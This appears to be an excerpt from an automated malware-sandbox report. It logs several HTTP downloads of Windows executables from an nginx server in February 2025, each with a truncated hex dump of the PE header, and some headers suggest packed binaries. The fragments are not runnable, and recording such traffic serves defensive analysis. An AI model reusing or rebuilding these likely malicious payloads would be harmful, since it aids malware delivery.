                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:21 GMTContent-Type: application/octet-streamContent-Length: 1013457Last-Modified: Tue, 28 Jan 2025 06:49:56 GMTConnection: keep-aliveETag: "67987e14-f76d1"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 f5 d7 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 c6 5e 00 00 00 00 00 00 00 00 00 00 69 4e 0f 00 68 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c6 5e 00 00 00 00 10 00 00 60 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 60 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:25 GMTContent-Type: application/octet-streamContent-Length: 1890304Last-Modified: Sat, 01 Feb 2025 15:20:01 GMTConnection: keep-aliveETag: "679e3ba1-1cd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 cb 85 81 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 28 04 00 00 ba 00 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 3e a5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 50 05 00 6b 00 00 00 00 40 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 51 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 05 00 00 10 00 00 00 7a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 40 05 00 00 02 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 50 05 00 00 02 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 60 05 00 00 02 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 6d 6a 74 6a 69 00 30 1a 00 00 70 30 00 00 22 1a 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 65 77 66 6e 68 6b 00 10 00 00 00 a0 4a 00 00 04 00 00 00 b2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 b6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:31 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:37 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:42 GMTContent-Type: application/octet-streamContent-Length: 10584064Last-Modified: Sat, 01 Feb 2025 09:45:44 GMTConnection: keep-aliveETag: "679ded48-a18000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d 82 ee b9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e0 a0 00 00 9e 00 00 00 00 00 00 f2 fd a0 00 00 20 00 00 00 00 a1 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 a1 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 fd a0 00 4f 00 00 00 00 00 a1 00 64 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a1 00 0c 00 00 00 84 fd a0 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 de a0 00 00 20 00 00 00 e0 a0 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 64 9b 00 00 00 00 a1 00 00 9c 00 00 00 e2 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 a1 00 00 02 00 00 00 7e a1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 fd a0 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 27 00 00 00 3d 00 00 03 00 02 00 25 00 00 06 8c 64 00 00 f8 98 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 72 01 00 00 70 28 13 00 00 0a 2a a6 17 8d 2a 00 00 01 25 16 20 dd 3a 17 59 9e 80 01 00 00 04 7f 02 00 00 04 fe 15 01 00 00 1b 73 14 00 00 0a 80 03 00 00 04 2a 2e 72 35 00 00 70 28 15 00 00 0a 2a b2 19 8d 2c 00 00 01 25 d0 3a 00 00 04 28 16 00 00 0a 80 04 00 00 04 7f 05 00 00 04 fe 15 02 00 00 1b 73 14 00 00 0a 80 06 00 00 04 2a 2e 72 4f 00 00 70 28 15 00 00 0a 2a 2e 72 7f 00 00 70 28 17 00 00 0a 2a 2e 72 ad 00 00 70 28 13 00 00 0a 2a 2e 72 d3 00 00 70 28 17 00 00 0a 2a 06 2a 06 2a 6e 02 17 8d 2a 00 00 01 25 16 20 16 80 c9 30 9e 7d 07 00 00 04 02 28 18 00 00 0a 2a 2e 72 eb 00 00 70 28 19 00 00 0a 2a a6 02 19 8d 2c 00 00 01 25 d0 36 00 00 04 28 16 00 00 0a 7d 09 00 00 04 02 73 14 00 00 0a 7d 0b 00 00 04 02 28 18 00 00 0a 2a 2e 72 05 01 00 70 28 1a 00 00 0a 2a 2e 72 3d 01 00 70 28 1b 00 00 0a 2a 00 00 00 1b 30 04 00 7b 00 00 00 01 00 00 11 73 1c 00 00 0a 0a 73 1d 00 00 0a 0b 07 28 1e 00 00 0a 03 6f 1f 00 00 0a 6f 20 00 00 0a 0c 06 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:55 GMTContent-Type: application/octet-streamContent-Length: 3789149Last-Modified: Sat, 01 Feb 2025 10:03:34 GMTConnection: keep-aliveETag: "679df176-39d15d"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:03 GMTContent-Type: application/octet-streamContent-Length: 6483456Last-Modified: Sat, 01 Feb 2025 14:52:32 GMTConnection: keep-aliveETag: "679e3530-62ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 52 54 9b 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d0 47 00 00 c6 69 00 00 32 00 00 00 60 a1 00 00 10 00 00 00 e0 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 a1 00 00 04 00 00 a6 75 63 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 67 00 73 00 00 00 00 00 67 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 c8 69 00 88 06 00 00 bc 45 a1 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 45 a1 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 66 00 00 10 00 00 00 8c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 67 00 00 02 00 00 00 9c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 67 00 00 02 00 00 00 9e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 74 61 64 7a 73 6e 6d 00 30 3a 00 00 20 67 00 00 28 3a 00 00 a0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 73 6d 6a 72 62 6b 69 00 10 00 00 00 50 a1 00 00 04 00 00 00 c8 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 a1 00 00 22 00 00 00 cc 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:12 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Sat, 01 Feb 2025 15:06:42 GMTConnection: keep-aliveETag: "679e3882-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 